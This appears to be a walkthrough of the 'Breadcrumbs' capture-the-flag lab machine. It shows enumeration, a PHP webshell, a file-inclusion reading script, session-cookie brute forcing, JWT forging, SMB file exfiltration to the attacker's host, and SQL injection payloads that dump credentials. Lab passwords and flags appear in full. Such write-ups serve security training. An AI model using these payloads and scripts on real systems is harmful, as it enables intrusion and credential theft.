Breadcrums
Enumeration
As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.228 -oN allPorts
-sSuse the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.--min-rate 5000nmap will try to keep the sending rate at or above 5000 packets per second.-p-scanning the entire port range, from 1 to 65535.-T5insane mode, it is the fastest mode of the nmap time template.-Pnassume the host is online.-nscan without reverse DNS resolution.-oNsave the scan result into a file, in this case the allports file.
# Nmap 7.92 scan initiated Wed Sep 7 16:10:46 2022 as: nmap -sS --min-rate 5000 -n -Pn -p- -oN allPorts 10.10.10.228
Nmap scan report for 10.10.10.228
Host is up (0.057s latency).
Not shown: 65520 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
3306/tcp open mysql
5040/tcp open unknown
7680/tcp open pando-pub
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
# Nmap done at Wed Sep 7 16:11:01 2022 -- 1 IP address (1 host up) scanned in 15.11 secondsNow that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
nmap -sC -sV -p22,80,135,139,443,445,3306,5040,7680,49664,49665,49666,49667,49668,49669 10.10.10.228 -oN targeted
-sCperforms the scan using the default set of scripts.-sVenables version detection.-oNsave the scan result into file, in this case the targeted file.
# Nmap 7.92 scan initiated Wed Sep 7 16:12:34 2022 as: nmap -sCV -p22,80,135,139,443,445,3306,5040,7680,49664,49665,49666,49667,49668,49669 -oN targeted 10.10.10.228
Nmap scan report for 10.10.10.228
Host is up (0.050s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 9d:d0:b8:81:55:54:ea:0f:89:b1:10:32:33:6a:a7:8f (RSA)
| 256 1f:2e:67:37:1a:b8:91:1d:5c:31:59:c7:c6:df:14:1d (ECDSA)
|_ 256 30:9e:5d:12:e3:c6:b7:c6:3b:7e:1e:e7:89:7e:83:e4 (ED25519)
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1h PHP/8.0.1)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/8.0.1
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-title: Library
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1h PHP/8.0.1)
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
| tls-alpn:
|_ http/1.1
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-title: Library
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/8.0.1
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds?
3306/tcp open mysql?
5040/tcp open unknown
7680/tcp open pando-pub?
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-09-07T14:15:23
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Sep 7 16:15:35 2022 -- 1 IP address (1 host up) scanned in 181.10 secondsIt looks like there is a website on port 80.
If we click on the Check books. button, we'll see what looks like a books search tool
http://10.10.10.228/php/books.php
If search for a random character, like the s letter, it will show us books with the s character in the title.
The Book button will show some details about the book.
Let's try to list some subdirectories with wfuzz.
wfuzz -c --hc=404 -t 200 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt http://10.10.10.228/FUZZ
-coutput with colors.--hchide responses with the specified code.-tspecify the number of concurrent connections.-wspecify a wordlist file.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://10.10.10.228/FUZZ
Total requests: 87650
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000121: 301 9 L 30 W 336 Ch "books"
000000325: 301 9 L 30 W 334 Ch "php"
000000355: 301 9 L 30 W 337 Ch "portal"
000000535: 301 9 L 30 W 334 Ch "css"
000000623: 301 9 L 30 W 339 Ch "includes"
000000838: 301 9 L 30 W 333 Ch "db"
000000940: 301 9 L 30 W 333 Ch "js"
000001021: 301 9 L 30 W 336 Ch "Books"
000000888: 503 11 L 44 W 401 Ch "examples"
000001818: 403 11 L 47 W 420 Ch "licenses"
000003297: 301 9 L 30 W 334 Ch "PHP"
000003798: 403 9 L 30 W 301 Ch "%20"
000005133: 301 9 L 30 W 337 Ch "Portal"
000007067: 403 9 L 30 W 301 Ch "*checkout*"
000008142: 301 9 L 30 W 334 Ch "CSS"
000009285: 301 9 L 30 W 333 Ch "JS"
000011188: 403 9 L 30 W 301 Ch "phpmyadmin"
000014388: 403 9 L 30 W 301 Ch "webalizer"The /books directory has several .html files with the content of the books that the search tool is loading.
http://10.10.10.228/books/
Then /portal directory show a login page.
http://10.10.10.228/portal/login.php
Then /includes directory show a few .php files.
http://10.10.10.228/includes/
And the /db directory has a db.php file. Everything else has nothing interesting in it, or we are not allowd to see it.
Let's create an account on the login page we saw on /portal.
http://10.10.10.228/portal/signup.php
Then, log in as the new user.
Now, we see a page with different sections.
Then Check tasks section shows some tasks. One of them is saying that the PHPSESSID cookie has infinite session duration.
http://10.10.10.228/portal/php/issues.php
The Order pizza button shows a popup alert.
The User management section shows a list of users with their respective role.
http://10.10.10.228/portal/
And finally, the File management button just do a redirect to the current page. We could try to enumerate subdirectories again, but this time under the /portal directory.
wfuzz -c --hc=404 -t 200 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt http://10.10.10.228/portal/FUZZ
-coutput with colors.--hchide responses with the specified code.-tspecify the number of concurrent connections.-wspecify a wordlist file.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://10.10.10.228/portal/FUZZ
Total requests: 87650
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000150: 301 9 L 30 W 345 Ch "uploads"
000000278: 301 9 L 30 W 344 Ch "assets"
000000325: 301 9 L 30 W 341 Ch "php"
000000623: 301 9 L 30 W 346 Ch "includes"
000000838: 301 9 L 30 W 340 Ch "db"
000001466: 301 9 L 30 W 344 Ch "vendor"
000004744: 301 9 L 30 W 344 Ch "Assets"Exploitation
If we click on the File management button, I will do a redirect to the current index.php file as we saw. Let's try to bypass it. First, intercept the request with BurpSuite. Then, press right click, and press on Do intercept > Response to this request.
If we hit Forward, we'll get the response from the server, and as you can see, the code is a 302 Found. We could try to change it to 200 OK, so the redirect doesn't happen.
Press Forward again, and you'll see the Task Submission page on the browser.
Let's create a simple webshell in PHP, and upload it.
nano webshell.php
<?php echo shell_exec($_REQUEST["cmd"]); ?>If we try to upload it, it will say that only admins can upload files. We'll have to become one of the admins users, either alex, paul or jack.
Let's go back to the /php/books.php file, which took the book's data from the /books HTML files.
Let's intercept the request when we hit Book, and send it to the repeater.
If we put some wrong data in the book parameter, we'll get an error showing an absolute path. The error show how the website is trying to look for a book in the ../books directory.
Let's try to put the bookController.php file the error is showing in the book parameter with the directory path traversal pattern.
It looks like we did a Local File Inclusion attack, which allow us to read the content of the PHP files. I made a simple bash script which prints out in a nice way the content of the file that you give it.
#!/bin/bash
curl -s -X POST http://10.10.10.228/includes/bookController.php -d "book=$1&method=1" | sed 's/\\n/\n/g' | sed 's/\\r//g' | sed 's/\\"/\"/g' | sed 's/\\\//\//g'If we execute the script giving the ../includes/bookController.php file as an argument, we'll see that the file is requiring the file ../db/db.php.
./lfi.sh ../includes/bookController.php
<?php
if($_SERVER['REQUEST_METHOD'] == "POST"){
$out = "";
require '../db/db.php';
$title = "";
$author = "";
if($_POST['method'] == 0){
if($_POST['title'] != ""){
$title = "%".$_POST['title']."%";
}
if($_POST['author'] != ""){
$author = "%".$_POST['author']."%";
}
$query = "SELECT * FROM books WHERE title LIKE ? OR author LIKE ?";
$stmt = $con->prepare($query);
$stmt->bind_param('ss', $title, $author);
$stmt->execute();
$res = $stmt->get_result();
$out = mysqli_fetch_all($res,MYSQLI_ASSOC);
}
elseif($_POST['method'] == 1){
$out = file_get_contents('../books/'.$_POST['book']);
}
else{
$out = false;
}
echo json_encode($out);
}Let's see the content of ../db/db.php.
<?php
$host="localhost";
$port=3306;
$user="bread";
$password="jUli901";
$dbname="bread";
$con = new mysqli($host, $user, $password, $dbname, $port) or die ('Could not connect to the database server' . mysqli_connect_error());
?>We found some credentials. As we have to become one of the admin users, we have to get their cookies. I have two cookies, a JWT (Jason Web Token) cookie and a PHPSESSID cookie.
Note that the PHPSESSID cookie starts with my username. If we check the /portal/php/admins.php page, we'll see that paul is the only admin which is online, which means that he might be a great target to steal his cookies.
The first time we logged in, we did it with the /portal/login.php file. Let's try to see it's content.
./lfi.sh ../portal/login.php
<?php
require_once 'authController.php';
?>
...As we can see at the top, it is requiring the authController.php file. Let's take a look at it.
./lfi.sh ../portal/authController.php
<?php
require 'db/db.php';
require "cookie.php";
require "vendor/autoload.php";
use \\Firebase\\JWT\\JWT;
...
if($valid){
session_id(makesession($username));
session_start();
$secret_key = '6cb9c1a2786a483ca5e44571dcc5f3bfa298593a6376ad92185c3258acd5591e';
$data = array();
$payload = array(
"data" => array(
"username" => $username
));
$jwt = JWT::encode($payload, $secret_key, 'HS256');
...We found the secret key that is being used to encrypt the JWT. Now we could get the JWT of paul. Go to jwt.io, copy and paste our own JWT, replace our username with paul, and add the secret key we just found to the VERIFY SIGNATURE section.
Now we need the PHPSESSID of the paul user. Note again how the authController.php file is requiring the cookie.php file. Let's see it's content.
./lfi.sh ../portal/cookie.php
<?php
/**
* @param string $username Username requesting session cookie
*
* @return string $session_cookie Returns the generated cookie
*
* @devteam
* Please DO NOT use default PHPSESSID; our security team says they are predictable.
* CHANGE SECOND PART OF MD5 KEY EVERY WEEK
* */
function makesession($username){
$max = strlen($username) - 1;
$seed = rand(0, $max);
$key = "s4lTy_stR1nG_".$username[$seed]."(!528./9890";
$session_cookie = $username.md5($key);
return $session_cookie;
}The cookie is just a MD5 hash of a specific string with a character in between, which any character of the username. It looks like we can brute force the cookie. I made the following script, which will add each letter of paul to the string, then it will calculate the MD5 hash, and finally, it will check if the cookie is correct.
import hashlib, requests
for char in "paul":
hash_user = hashlib.md5(f"s4lTy_stR1nG_{char}(!528./9890".encode('utf-8')).hexdigest()
cookie = f"paul{hash_user}"
resp = requests.get("http://10.10.10.228/portal/index.php", cookies={"PHPSESSID": str(cookie)})
if "paul" in resp.text.lower():
print(f"\r[+] Found cookie for paul: {cookie}")If we execute the script, we'll get the PHPSESSID cookie of the paul user.
python cookie.py
[+] Found cookie for paul: paul47200b180ccd6835d25d034eeb6e6390Replace the PHPSESSID cookie and the JWT cookies of the paul user on the browser.
If now we refresh the website, we'll see that we are logged in as paul.
Now we can upload the webshell successfully.
As we saw when we fuzz subdirectories on /portal, there was a /uploads directory, let's check it.
There is our webshell. The problem is that it has the .zip extension. Let's upload it again, but now intercept the request with BurpSuite.
The name of the task change, and the script put the .zip extension automatically. Let's modify it, and call it webshell.php.
If we check now the /uploads directory, we'll see our webshell with the correct extension.
Finally, we can execute commands on the victim machine.
http://10.10.10.228/portal/uploads/webshell.php?cmd=whoami
If we check the content of the current directory, we'll see the two files that we uploaded, and an the absolute path where we are executing the commands.
http://10.10.10.228/portal/uploads/webshell.php?cmd=dir
Let's see what's in a directory further back.
http://10.10.10.228/portal/uploads/webshell.php?cmd=dir C:\Users\www-data\Desktop\xampp\htdocs\portal\
The pizzaDeliveryUserData folder looks interesting.
http://10.10.10.228/portal/uploads/webshell.php?cmd=dir C:\Users\www-data\Desktop\xampp\htdocs\portal\pizzaDeliveryUserData
The juliette user is the only one that looks like is not disable. If we check the content of juliette.json file, we'll see some credentials.
http://10.10.10.228/portal/uploads/webshell.php?cmd=type C:\Users\www-data\Desktop\xampp\htdocs\portal\pizzaDeliveryUserData\juliette.json
Now we can log in into the machine as the juliette user. Then, we'll be able to grab the user flag.
sshpass -p 'jUli901./())!' ssh juliette@10.10.10.228
Microsoft Windows [Version 10.0.19041.746]
(c) 2020 Microsoft Corporation. All rights reserved.
juliette@BREADCRUMBS C:\Users\juliette>whoami
breadcrumbs\juliette
juliette@BREADCRUMBS C:\Users\juliette>type Desktop\user.txt
65af66921d5d45bad99bd8f8c0bf08baPrivilege Escalation
If we check the desktop of the juliette user, we'll see the user flag, and the todo.html file.
dir \Users\juliette\Desktop
Volume in drive C has no label.
Volume Serial Number is 7C07-CD3A
Directory of C:\Users\juliette\Desktop
01/15/2021 05:04 PM <DIR> .
01/15/2021 05:04 PM <DIR> ..
12/09/2020 07:27 AM 753 todo.html
09/08/2022 12:41 PM 34 user.txt
2 File(s) 787 bytes
2 Dir(s) 5,515,169,792 bytes freeThe HTML file just shows a table with pending tasks. One of them is saying that there might be some passwords in the Microsoft Store Sticky Notes application.
type \Users\juliette\Desktop\todo.html
<html>
<style>
html{
background:black;
color:orange;
}
table,th,td{
border:1px solid orange;
padding:1em;
border-collapse:collapse;
}
</style>
<table>
<tr>
<th>Task</th>
<th>Status</th>
<th>Reason</th>
</tr>
<tr>
<td>Configure firewall for port 22 and 445</td>
<td>Not started</td>
<td>Unauthorized access might be possible</td>
</tr>
<tr>
<td>Migrate passwords from the Microsoft Store Sticky Notes application to our new password manager</td>
<td>In progress</td>
<td>It stores passwords in plain text</td>
</tr>
<tr>
<td>Add new features to password manager</td>
<td>Not started</td>
<td>To get promoted, hopefully lol</td>
</tr>
</table>
</html>I look for the path where the Sticky Notes program is stored, and I found the C:\Users\username\AppData\Roaming\Microsoft\Sticky Notes path. But, in the machine, the Sticky Notes directory doesn't exist.
dir \Users\juliette\AppData\Roaming\Microsoft
Volume in drive C has no label.
Volume Serial Number is 7C07-CD3A
Directory of C:\Users\juliette\AppData\Roaming\Microsoft
01/15/2021 05:00 PM <DIR> Internet Explorer
01/15/2021 05:00 PM <DIR> Network
03/02/2021 02:31 PM <DIR> Spelling
01/15/2021 04:59 PM <DIR> Vault
02/01/2021 04:58 AM <DIR> Windows
0 File(s) 0 bytes
5 Dir(s) 5,515,116,544 bytes freeI look for other paths where the program files could be stored, and I found the C:\Users\Username\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState backup path, which do exists on the machine.
dir \Users\juliette\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbw e\LocalState
Volume in drive C has no label.
Volume Serial Number is 7C07-CD3A
Directory of C:\Users\juliette\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState
01/15/2021 05:10 PM <DIR> .
01/15/2021 05:10 PM <DIR> ..
01/15/2021 05:10 PM 20,480 15cbbc93e90a4d56bf8d9a29305b8981.storage.session
11/29/2020 04:10 AM 4,096 plum.sqlite
01/15/2021 05:10 PM 32,768 plum.sqlite-shm
01/15/2021 05:10 PM 329,632 plum.sqlite-wal
4 File(s) 386,976 bytes
2 Dir(s) 5,515,014,144 bytes freeWe can see that the plum.sqlite-wal file is the one that weighs the most. Let's transfer it to our machine. First, set a simple SMB server on our local machine.
impacket-smbserver smbFolder $(pwd) -smb2support
Then, on the victim machine, copy the file to the smbFolder share.
copy plum.sqlite-wal \10.10.14.11\smbFolder
On our local machine, we can check that the file is a SQLite file.
file plum.sqlite-wal
plum.sqlite-wal: SQLite Write-Ahead Log, version 3007000But, if we try to see it's content with SQLite, we get an error.
sqlite3 plum.sqlite-wal
SQLite version 3.39.2 2022-07-21 15:24:47
Enter ".help" for usage hints.
sqlite> .tables
Error: file is not a databaseIf we print out the readable strings of the file, we'll see some new credentials for the development user.
strings plum.sqlite-wal
...
\id=48c70e58-fcf9-475a-aea4-24ce19a9f9ec juliette: jUli901./())!
\id=fc0d8d70-055d-4870-a5de-d76943a68ea2 development: fN3)sN5Ee@g
\id=48924119-7212-4b01-9e0f-ae6d678d49b2 administrator: [MOVED]ManagedPosition=Yellow0c32c3d8-7c60-48ae-939e-798df198cfe78e814e57-9d28-4288-961c-31c806338c5bLet's log in as the development user.
sshpass -p 'fN3)sN5Ee@g' ssh development@10.10.10.228
Microsoft Windows [Version 10.0.19041.746]
(c) 2020 Microsoft Corporation. All rights reserved.
development@BREADCRUMBS C:\Users\development>whoami
breadcrumbs\developmentAt this point, if we check the root directory, we'll see thee Development directory.
dir \
Volume in drive C has no label.
Volume Serial Number is 7C07-CD3A
Directory of C:\
01/15/2021 05:03 PM <DIR> Anouncements
01/15/2021 05:03 PM <DIR> Development
12/07/2019 02:14 AM <DIR> PerfLogs
02/01/2021 08:50 AM <DIR> Program Files
12/07/2019 02:54 AM <DIR> Program Files (x86)
01/17/2021 02:41 AM <DIR> Users
02/01/2021 02:10 AM <DIR> Windows
0 File(s) 0 bytes
7 Dir(s) 5,511,622,656 bytes freeWhich contains a binary called Krypter_Linux.
dir \Development
Volume in drive C has no label.
Volume Serial Number is 7C07-CD3A
Directory of C:\Development
01/15/2021 05:03 PM <DIR> .
01/15/2021 05:03 PM <DIR> ..
11/29/2020 04:11 AM 18,312 Krypter_Linux
1 File(s) 18,312 bytes
2 Dir(s) 5,511,667,712 bytes freeLet's transfer it to our machine, the same way we did it before. This time, if we check the readable strings on the binary, we'll see a URL with some HTTP parameters.
strings Krypter_Linux
...
http://passmanager.htb:1234/index.php
method=select&username=administrator&table=passwords
...But, as we can see, port 1234 is only available locally.
netstat -nat
-nshow active TCP connections.-ashow TCP and UDP listening ports.-tdisplays the download status of the current connection.
Active Connections
Proto Local Address Foreign Address State Offload State
...
TCP 127.0.0.1:1234 0.0.0.0:0 LISTENING InHost
...To access the website, we'll have to do port forwarding with SSH.
sshpass -p 'jUli901./())!' ssh juliette@10.10.10.228 -L 1234:127.0.0.1:1234
-Llocal port forwarding is enabled.
If now we make a GET request to our local machine on port 1234, with the parameters that we saw, we'll see what looks like the AES key needed to decrypt the administrator password.
curl -s "http://127.0.0.1:1234/?method=select&username=administrator&table=passwords"
selectarray(1) {
[0]=>
array(1) {
["aes_key"]=>
string(16) "k19D193j.<19391("
}
}If we change the value of the username parameter, from administrator to ', we'll get an SQL error.
curl -s "http://127.0.0.1:1234/?method=select&username='&table=passwords"
select<br />
<b>Fatal error</b>: Uncaught TypeError: mysqli_fetch_all(): Argument #1 ($result) must be of type mysqli_result, bool given in C:\Users\Administrator\Desktop\passwordManager\htdocs\index.php:18
Stack trace:
#0 C:\Users\Administrator\Desktop\passwordManager\htdocs\index.php(18): mysqli_fetch_all(false, 1)
#1 {main}
thrown in <b>C:\Users\Administrator\Desktop\passwordManager\htdocs\index.php</b> on line <b>18</b><br />It looks like the application is vulnerable to SQL Injection. Let's try to check if the database has only one table.
curl -X POST "http://127.0.0.1:1234/" -d "method=select&username='union select 1 -- -&table=passwords"
selectarray(1) {
[0]=>
array(1) {
["aes_key"]=>
string(1) "1"
}
}As we don't get any error, there is only one table in the current database. We could see that the database name is bread.
curl -X POST "http://127.0.0.1:1234/" -d "method=select&username='union select database()-- -&table=passwords"
selectarray(1) {
[0]=>
array(1) {
["aes_key"]=>
string(5) "bread"
}
}We can see that there is one table called passwords.
curl -X POST "http://127.0.0.1:1234/" -d "method=select&username='union select table_name from information_schema.tables where table_schema='bread'-- -&table=passwords"
selectarray(1) {
[0]=>
array(1) {
["aes_key"]=>
string(9) "passwords"
}
}The passwords table has the id, account, password and aes_key columns.
curl -X POST "http://127.0.0.1:1234/" -d "method=select&username='union select column_name from information_schema.columns where table_schema='bread' and table_name='passwords'-- -&table=passwords"
selectarray(4) {
[0]=>
array(1) {
["aes_key"]=>
string(2) "id"
}
[1]=>
array(1) {
["aes_key"]=>
string(7) "account"
}
[2]=>
array(1) {
["aes_key"]=>
string(8) "password"
}
[3]=>
array(1) {
["aes_key"]=>
string(7) "aes_key"
}
}Now we can print out the values of all those columns separated by the : character.
curl -X POST "http://127.0.0.1:1234/" -d "method=select&username='union select concat(id,0x3a,account,0x3a,password,0x3a,aes_key) from bread.passwords-- -&table=passwords"
selectarray(1) {
[0]=>
array(1) {
["aes_key"]=>
string(77) "1:Administrator:H2dFz/jNwtSTWDURot9JBhWMP6XOdmcpgqvYHG35QKw=:k19D193j.<19391("
}
}Now, we have the password of the Administrator user, but it is encoded in base64, and then encrypted in AES. Let's use CyberChef and try to break it. Copy and paste the password in the Input field, then find From Base64 operation, drag it to the Recipe section, and do the same with the AES Decrypt operation. Then copy the AES key that we got in the SQL Injection, and paste it in the Key field of the AES Decrypt operation, change the key encoding to UTF8, and the input type to Raw.
We can't decrypt the password yet because the IV field is missing. We could try to fill it with 0 numbers. Do it until the output message doesn't say that is expecting any more bytes, then we'll get the password for the administrator user.
Now, log in via SSH as the administrator user, and then all we have to do is reap the harvest and take the root flag.
sshpass -p 'p@ssw0rd!@#$9890./' ssh administrator@10.10.10.228
administrator@BREADCRUMBS C:\Users\Administrator>whoami
breadcrumbs\administrator
administrator@BREADCRUMBS C:\Users\Administrator>type Desktop\root.txt
a49eb77fdf06b67bc60ffc4f0850770fLast updated
Was this helpful?